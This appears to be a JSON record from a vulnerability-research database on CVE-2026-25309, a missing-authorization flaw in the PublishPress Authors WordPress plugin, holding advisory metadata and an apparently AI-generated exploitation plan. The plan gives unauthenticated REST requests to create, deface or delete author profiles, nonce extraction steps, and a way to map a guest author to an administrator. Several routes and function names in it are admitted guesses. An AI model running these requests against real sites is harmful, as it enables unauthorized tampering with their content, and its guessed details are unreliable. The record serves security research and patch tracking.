[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f_wtBkR9HNGKJAMbRs1tRQcTR2_Tz4zobVrni1-qASuA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-25309","co-authors-multiple-authors-and-guest-authors-in-an-author-box-with-publishpress-authors-missing-authorization","Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors \u003C= 4.10.1 - Missing Authorization","The Co-Authors, Multiple Authors and Guest Authors in an Author Box with PublishPress Authors plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.10.1. 
This makes it possible for unauthenticated attackers to perform an unauthorized action.","publishpress-authors",null,"\u003C=4.10.1","4.11.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-17 00:00:00","2026-03-27 20:26:26",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3ff3c560-26b6-4139-97dc-670ea9b8bb33?source=api-prod",11,[22,23,24,25,26,27,28,29],"CHANGELOG.md","defines.php","languages\u002Fpublishpress-authors-es_ES.po","languages\u002Fpublishpress-authors-fr_FR.po","languages\u002Fpublishpress-authors-it_IT.po","lib\u002Fvendor\u002Fcomposer\u002Finstalled.json","lib\u002Fvendor\u002Fcomposer\u002Finstalled.php","lib\u002Fvendor\u002Fpublishpress\u002Fpsr-container\u002Flib\u002FVersions.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-25309 (PublishPress Authors)\n\n## 1. Vulnerability Summary\nThe **PublishPress Authors** plugin (\u003C= 4.10.1) contains a missing authorization vulnerability in its REST API implementation. Specifically, the REST API endpoints introduced in version 4.8.0 to \"create and update Authors and their fields\" (identified in the changelog as feature #2065) do not implement sufficient capability checks. This allows unauthenticated attackers to create, modify, or delete author profiles (Guest Authors), which are stored as `ppma_author` custom post type objects.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** WordPress REST API.\n- **Base Route:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1`\n- **Resource Route:** `\u002Fauthors` or `\u002Fauthor`\n- **HTTP Methods:** `POST` (Create), `PUT` \u002F `PATCH` (Update), `DELETE` (Delete).\n- **Vulnerable Parameter:** The entire JSON body for creating\u002Fupdating author profiles.\n- **Authentication:** None required (Unauthenticated).\n- **Preconditions:** The plugin must be active. 
Guest Author functionality is typically enabled by default.\n\n## 3. Code Flow\n1. **Registration:** The plugin registers REST routes during the `rest_api_init` hook. Based on the 4.8.0 changelog, a controller class (likely within `src\u002Fcore\u002FClasses\u002F` or `src\u002Fcore\u002FRest\u002F`) registers routes for author management.\n2. **Missing Check:** Within the `register_rest_route` call for the authors endpoint, the `permission_callback` is either missing, set to `__return_true`, or fails to verify if the requester has the `edit_posts` or `manage_options` capability.\n3. **Execution:** The handler function (e.g., `create_item` or `update_item`) processes the input and uses `wp_insert_post` or internal plugin methods (like those in `src\u002Fcore\u002FClasses\u002FAuthor_Editor.php`) to save the `ppma_author` data without verifying user permissions.\n\n## 4. Nonce Acquisition Strategy\nREST API endpoints in WordPress typically require a `wp_rest` nonce for authenticated sessions to prevent CSRF. However, for **unauthenticated** access to a route where `permission_callback` is `__return_true`, the nonce check is often bypassed or not enforced by the REST server for the \"anonymous\" user.\n\nIf a nonce is strictly required:\n1. **Identify Exposure:** The plugin may expose a REST nonce via `wp_localize_script` to support its block editor or author box features.\n2. **Shortcode Strategy:**\n   - Create a page with the author list shortcode: `[publishpress_authors_list]`\n   - `wp post create --post_type=page --post_status=publish --post_title=\"Authors\" --post_content='[publishpress_authors_list]'`\n3. **Extraction:**\n   - Navigate to the new page.\n   - Use `browser_eval` to find the nonce: `browser_eval(\"window.ppAuthorsData?.rest_nonce\")` or check for common PublishPress localization objects like `window.publishpressAuthorsConfig`.\n\n## 5. 
Exploitation Strategy\nWe will attempt to create a new Guest Author profile via the REST API.\n\n### Step 1: Discover the exact REST route\nPerform a GET request to the REST index to confirm the available routes for the plugin.\n- **Method:** `GET`\n- **URL:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1`\n- **Tool:** `http_request`\n\n### Step 2: Create a Guest Author\n- **Method:** `POST`\n- **URL:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1\u002Fauthors` (or `\u002Fauthor`)\n- **Headers:** \n    - `Content-Type: application\u002Fjson`\n- **Body (JSON):**\n```json\n{\n    \"title\": \"Injected Author\",\n    \"description\": \"This author was created via CVE-2026-25309.\",\n    \"email\": \"attacker@example.com\",\n    \"slug\": \"hacked-author\",\n    \"first_name\": \"Hacked\",\n    \"last_name\": \"Author\"\n}\n```\n\n### Step 3: Update an Existing Author (If creation fails)\nIf creation is restricted but update is not, attempt to overwrite an existing Guest Author (ID can be found by listing authors).\n- **Method:** `POST` or `PUT`\n- **URL:** `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1\u002Fauthors\u002F\u003CID>`\n- **Body (JSON):**\n```json\n{\n    \"description\": \"Defaced bio\"\n}\n```\n\n## 6. Test Data Setup\n1. Ensure PublishPress Authors is installed and active on version 4.10.1.\n2. Create at least one post and assign it to a Guest Author via the WP Admin to ensure the `ppma_author` post type is initialized and a legitimate target exists.\n3. (Optional) Create a page with the `[publishpress_authors_list]` shortcode to facilitate nonce discovery if needed.\n\n## 7. Expected Results\n- **Success:** The server returns a `201 Created` or `200 OK` response with a JSON object representing the newly created or modified author.\n- **Data Persistence:** A new post of type `ppma_author` will exist in the database with the title \"Injected Author\".\n\n## 8. 
Verification Steps\nAfter the exploit, verify via WP-CLI:\n```bash\n# List all Guest Authors to see the injected one\nwp post list --post_type=ppma_author\n\n# Check the specific content of the injected author\nwp post get $(wp post list --post_type=ppma_author --name=hacked-author --format=ids) --fields=post_title,post_content\n```\n\n## 9. Alternative Approaches\n- **Metadata Manipulation:** If the REST API allows updating `meta` fields, try to map the Guest Author to a real Administrator's user ID by updating the `mapped_user_id` meta field.\n- **AJAX Endpoint:** If the REST API is protected, check for the AJAX action `ppma_author_create_or_update` (inferred name) which might be registered via `wp_ajax_nopriv_`.\n- **Author Deletion:** Attempt a `DELETE` request to `\u002Fwp-json\u002Fpublishpress-authors\u002Fv1\u002Fauthors\u002F\u003CID>` to verify if unauthorized deletion is possible, causing a Denial of Service for author profiles.","gemini-3-flash-preview","2026-04-18 03:07:14","2026-04-18 03:07:39",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.10.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpublishpress-authors\u002Ftags\u002F4.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpublishpress-authors.4.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpublishpress-authors\u002Ftags\u002F4.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpublishpress-authors.4.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpublishpress-authors\u002Ftags"]